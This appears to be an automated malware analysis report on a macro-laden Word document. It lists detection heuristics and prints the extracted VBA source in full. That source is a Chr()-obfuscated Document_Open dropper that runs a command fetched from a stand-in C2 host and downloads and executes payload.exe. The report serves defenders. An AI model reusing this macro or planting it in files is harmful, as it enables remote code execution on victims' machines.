Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 0ae94f690f516c9e…

MALICIOUS

Office (OOXML) / .DOCX

20.2 KB Created: 2026-05-08 15:48:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-05-26
MD5: 8a7b2860e61f7c7564359ae6c8c71f1c SHA-1: 30d41d52a4c70d14fb4f7dcdf16dfd0429499e0b SHA-256: 0ae94f690f516c9e447abf6210178135e5db73712b1408ee3bb378e81845146c
450 Risk Score

Heuristics 10

  • ClamAV: Win.Worm.IFeel-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Worm.IFeel-1
  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Dim shell As Object
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        payloadData = http.ResponseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Dim shell As Object
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set fso = CreateObject(Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(105) & Chr(110) & Chr(103) & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        Set wmiService = GetObject(Chr(119) & Chr(105) & Chr(110) & Chr(109) & Chr(103) & Chr(109) & Chr(116) & Chr(115) & Chr(58) & Chr(47) & Chr(47) & Chr(46) & Chr(92) & Chr(114) & Chr(111) & Chr(111) & Chr(116) & Chr(92) & Chr(99) & Chr(105) & Chr(109) & Chr(118) & Chr(50))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.microsoft.com/office/2019/extlstReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2023/wordml/word16duReferenced by macro
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashReferenced by macro
    • http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlockReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6156 bytes
SHA-256: 196ad8570e4ded2ce8ccb88d052b4412c89c8e5c544f5930cb75d163989744da
Detection
ClamAV: Win.Worm.IFeel-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim wmiService As Object
    Dim processClass As Object
    Dim processMethod As Object
    Dim shell As Object
    Dim fso As Object
    Dim documentsFolder As Object
    Dim folder As Object
    Dim file As Object
    Dim c2Command As String
    Dim c2Server As String
    Dim http As Object
    Dim payloadURL As String
    Dim payloadData As String
    Dim payloadPath As String
    
    ' Set the C2 server URL
    c2Server = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(101) & Chr(120) & Chr(97) & Chr(109) & Chr(112) & Chr(108) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(99) & Chr(111) & Chr(109) & Chr(109) & Chr(97) & Chr(110) & Chr(100) & Chr(46) & Chr(116) & Chr(120) & Chr(116)
    
    ' Set the payload URL
    payloadURL = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(101) & Chr(120) & Chr(97) & Chr(109) & Chr(112) & Chr(108) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(112) & Chr(97) & Chr(121) & Chr(108) & Chr(111) & Chr(97) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
    
    ' Set the path to save the payload
    payloadPath = Chr(67) & Chr(58) & Chr(92) & Chr(87) & Chr(105) & Chr(110) & Chr(100) & Chr(111) & Chr(119) & Chr(115) & Chr(92) & Chr(84) & Chr(101) & Chr(109) & Chr(112) & Chr(92) & Chr(112) & Chr(97) & Chr(121) & Chr(108) & Chr(111) & Chr(97) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
    
    ' Create WMI service object
    Set wmiService = GetObject(Chr(119) & Chr(105) & Chr(110) & Chr(109) & Chr(103) & Chr(109) & Chr(116) & Chr(115) & Chr(58) & Chr(47) & Chr(47) & Chr(46) & Chr(92) & Chr(114) & Chr(111) & Chr(111) & Chr(116) & Chr(92) & Chr(99) & Chr(105) & Chr(109) & Chr(118) & Chr(50))
    Set processClass = wmiService.Get(Chr(87) & Chr(105) & Chr(110) & Chr(51) & Chr(50) & Chr(95) & Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
    Set processMethod = processClass.Methods_(Chr(67) & Chr(114) & Chr(101) & Chr(97) & Chr(116) & Chr(101))
    
    ' Execute cmd.exe to demonstrate WMI process creation
    processMethod.InParameters.Properties_(Chr(67) & Chr(111) & Chr(109) & Chr(109) & Chr(97) & Chr(110) & Chr(100) & Chr(76) & Chr(105) & Chr(110) & Chr(101)).Value = Chr(99) & Chr(109) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101) & Chr(32) & Chr(47) & Chr(99) & Chr(32) & Chr(101) & Chr(99) & Chr(104) & Chr(111) & Chr(32) & Chr(87) & Chr(77) & Chr(73) & Chr(32) & Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) & Chr(32) & Chr(67) & Chr(114) & Chr(101) & Chr(97) & Chr(116) & Chr(101) & Chr(100)
    wmiService.ExecMethod Chr(87) & Chr(105) & Chr(110) & Chr(51) & Chr(50) & Chr(95) & Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115), Chr(67) & Chr(114) & Chr(101) & Chr(97) & Chr(116) & Chr(101), processMethod.InParameters
    
    ' Create FileSystemObject to search for documents
    Set fso = CreateObject(Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(105) & Chr(110) & Chr(103) & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))
    Set documentsFolder = fso.GetSpecialFolder(2) ' 2 = Documents folder
    Set folder = fso.GetFolder(documentsFolder.Path)
    
    ' Search for .pdf and .docx files
    For Each file In folder.Files
        If LCase(fso.GetExtensionName(file.Name)) = Chr(112) & Chr(100) & Chr(102) Or LCase(fso.GetExtensionName(file.Name)) = Chr(100) & Chr(111) & Chr(99) & Chr(120) Then
            ' Perform actions on discovered files (e.g., exfiltrate data)
            ' For demonstration, we'll just echo the file name
            Set shell = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
            shell.Run Chr(99) & Chr(109) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101) & Chr(32) & Chr(47) & Chr(99) & Chr(32) & Chr(101) & Chr(99) & Chr(104) & Chr(111) & Chr(32) & Chr(68) & Chr(105) & Chr(115) & Chr(99) & Chr(111) & Chr(118) & Chr(101) & Chr(114) & Chr(101) & Chr(100) & Chr(32) & Chr(102) & Chr(105) & Chr(108) & Chr(101) & Chr(58) & Chr(32) & file.Name, 0, True
        End If
    Next file
    
    ' Fetch command from C2 server
    Set http = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84))
    http.Open Chr(71) & Chr(69) & Chr(84), c2Server, False
    http.Send
    c2Command = http.ResponseText
    
    ' Execute the command received from C2 server
    If c2Command <> "" Then
        Set shell = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
        shell.Run c2Command, 0, True
    End If
    
    ' Download payload from C2 server
    http.Open Chr(71) & Chr(69) & Chr(84), payloadURL, False
    http.Send
    payloadData = http.ResponseBody
    
    ' Save payload to disk
    Dim adTypeBinary As Integer
    adTypeBinary = 1
    Dim stream As Object
    Set stream = CreateObject(Chr(65) & Chr(68) & Chr(79) & Chr(66) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109))
    stream.Type = adTypeBinary
    stream.Open
    stream.Write payloadData
    stream.SaveToFile payloadPath, 2 ' 2 = overwrite
    
    ' Execute the downloaded payload
    Set shell = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
    shell.Run payloadPath, 0, True
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 16384 bytes
SHA-256: 16d5a6ae731c9a7226fb568fe58d477e87815bd4ffd678f55e6d3729bb263676
Detection
ClamAV: Win.Worm.IFeel-1
Obfuscation or payload: unlikely